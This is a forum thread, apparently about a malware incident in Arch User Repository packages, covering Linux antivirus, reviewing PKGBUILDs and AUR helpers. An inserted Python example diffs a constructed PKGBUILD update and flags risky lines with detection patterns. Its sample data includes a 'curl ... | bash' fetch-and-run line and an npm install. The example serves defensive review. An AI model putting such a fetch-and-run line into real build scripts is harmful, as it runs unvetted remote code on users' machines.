ClamAV users, how’s it going?
I learnt a lesson yeah. It looks like I got away, there’s no rootkit, I found nothing weird running, I don’t have npm installed, and up until now it doesn’t seem like the packages I had installed were compromised. But I had way more AUR packages installed than I was aware of. And I was just updating them without really caring about the PKGBUILD, I have better things to do. Multiple packages were outdated crap that shouldn’t have been there anymore.
I was careless and took too much risk. I reduced the installed AUR packages to a minimum, and from now on I will verify the PKGBUILDs on every update. Maybe Arch isn’t really what I need. I’m on the LTS kernel and I no longer really use the AUR. But switching will be a huge hassle and this setup will work well from here on out, so I’ll stick to it for now.
So what are good antivirus options for Linux? Is it still pretty much just ClamAV?
Our company uses ESET: https://www.eset.com/us/home/antivirus/
But afaik it costs money to really work.
But your brain should be the best antivirus you have.
Is there an AUR package for it? Seems not in the official repo.
One thread I found from 2 years ago where someone asked for the same thing, a lot of the replies are just “you don’t need antivirus on Linux” lmao
I am at “no fucking yays and the bunch, check the package create/update dates, read PKGBUILD, only update when necessary”. Has served me well so far
Arch users just randomly dropping “I use Arch btw” everywhere, it was only a matter of time.
And you believe that makes you safe?
Shit like this is a blemish on the Linux community.
The more popular Linux becomes, the less true this will be.
Avoid success at all costs - Simon Peyton Jones
I was on arch as a vestige from my school days, having never quite found the time to switch to something more stable. When I saw the news over the weekend, I checked and found 1 would-be-infected package on my machine that was thankfully months out of date. I’m well past the point of wanting to examine PKGBUILDs every time (hence the out of date package). But, instead of just removing AUR packages and sticking to arch repos, I decided to sweep up the technical debt by wiping and installing Fedora. I’m liking it so far, minus the absolute pain in the ass that is Nvidia on Linux. Fuck academics and their insistence on writing everything targeting CUDA; otherwise, I’d have saved a good bit of money a few years ago with a much more compatible AMD card.
Have you looked into drop-in (ZLUDA) or recompile (SCALE, chipStar) things? Though they may not have been helpful with the years gone by (and may each have their own pros/cons).
I’m still using a 1050Ti (and legacy driver shifting to AUR did block me from updating), value doesn’t seem great and not going to buy something used from eBay. So that still complicates things for me.
Distro-wise I probably want something slower than Arch but not sure about point releases. And I am hoping for something that does updates in a way more friendly to slower internet (giving less update friction), but I suspect it doesn’t exist. Some things (OpenSUSE, NixOS) seem like they might be closer to what I want but I have hangups about them (Patterns on SUSE and lack of videos for Slowroll, NixOS having multiple solutions for dynamically linked executables especially if I decide to stop using Steam directly).
Isn’t it just a single line command to get Nvidia working?
Use the AUR, have an antivirus, no infected packages. However I was thinking of switching to https://chimera-linux.org/ before the infected packages went out.
Custom OS that no one else has access to. It might be full of exploits and bugs, but only you would know that. 😉
Security through insecurity
Though, Linux being open source helps a lot
My eyes, I look at AUR packages before building them, as any real arch user does. AFAIK, antivirus programs would do the same to compiled binaries, looking for suspicious things and blocking if it finds something.
Also, an ad blocker.
Never trust an NPM library
Fuck node
… technical name for glory hole
OR
Your mom’s a fuck node
bu-but so many libraries need funding!
Linux Users: haha those silly windows users, always searching the web for their software and getting viruses.
Linux Users: oh no I got malware by searching the AUR!
The AUR is still safer. One, it is at least minimally moderated. If a malicious package is detected, it can be reported and removed. Two, the installer is usually not just a black box executable. Three, most of the build and runtime dependencies are from the official Arch repos, which provides some protection against supply chain attacks. For Windows installers, you have to trust the distributor to bundle clean DLLs (for that matter, the same applies to AppImages).
But if it starts downloading anything from NPM… ^C and run.
The most unsafe factor of the AUR is AUR helpers and their goal to dumb everything down and streamline the process as if the AUR were an official repo.
I’m not entirely sure I agree, I think the issue is with default settings.
Like you could use both yay and paru to diff the PKGBUILD of the most recent update and then read it, and then approve each. And I think that’s pretty helpful. But you could also just blindly accept the update with the right config or flag and that is not a good practice.
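The review step discussed in the comments above (read what changed in the PKGBUILD before approving an update), as an added example that is not part of the thread and not code from yay or paru: it diffs two PKGBUILD versions and flags added lines worth reading closely. The package name, URLs and both PKGBUILD texts are constructed, and the pattern list is this example's own assumption.

```python
import difflib
import re

# Heuristic patterns chosen for this example (assumptions, not exhaustive).
RISKY = {
    "pipe-to-shell": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
    "language-package-manager": re.compile(r"\b(npm|yarn|pnpm|pip3?|gem|cargo)\s+(install|i|add)\b"),
    "network-fetch": re.compile(r"\b(curl|wget|git\s+clone)\b"),
    "encoded-or-eval": re.compile(r"\bbase64\s+(-d|--decode)\b|\beval\b"),
    "source-or-checksum-change": re.compile(r"^\s*(source|\w+sums)(_\w+)?\s*=|\bSKIP\b"),
    "install-hook": re.compile(r"^\s*install\s*="),
}
# Constructed PKGBUILDs: the previously reviewed version and the incoming update.
OLD = """pkgname=example-tool
pkgver=1.2.0
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('CONSTRUCTED_PLACEHOLDER')
build() {
  make
}
package() {
  make DESTDIR="$pkgdir" install
}
"""
NEW = """pkgname=example-tool
pkgver=1.2.1
source=("https://mirror.example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('SKIP')
build() {
  npm install -g example-helper
  make
}
package() {
  make DESTDIR="$pkgdir" install
  curl -s https://example.invalid/setup.sh | bash
}
"""

def added_lines(old, new):
    """Lines present in the new PKGBUILD but not in the old one."""
    return [l[2:] for l in difflib.ndiff(old.splitlines(), new.splitlines()) if l.startswith("+ ")]

def review(old, new):
    """Return (line, [tags]) for each added, non-comment line matching a pattern."""
    findings = []
    for line in added_lines(old, new):
        tags = [t for t, rx in RISKY.items() if rx.search(line)]
        if tags and not line.lstrip().startswith("#"):
            findings.append((line.strip(), tags))
    return findings
```

A match only marks a line to read; an empty result does not mean the update is clean, and anything the PKGBUILD pulls in (a `.install` file, the upstream source itself) still needs its own look.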
Yeah, use and promote aurto instead. They require you to trust the maintainer and would remove the package from the local repo if the maintainer is changed
Ye my reaction to this was basically uninstalling yay to force me to do it manually
AppImages are kinda like portable app versions.
AUR naur! for all my Australians out there.
Don’t worry, I found a package on npm to help!
By misusing the AUR and ignoring every warning telling you to read and understand the pkgbuild or don’t do it.















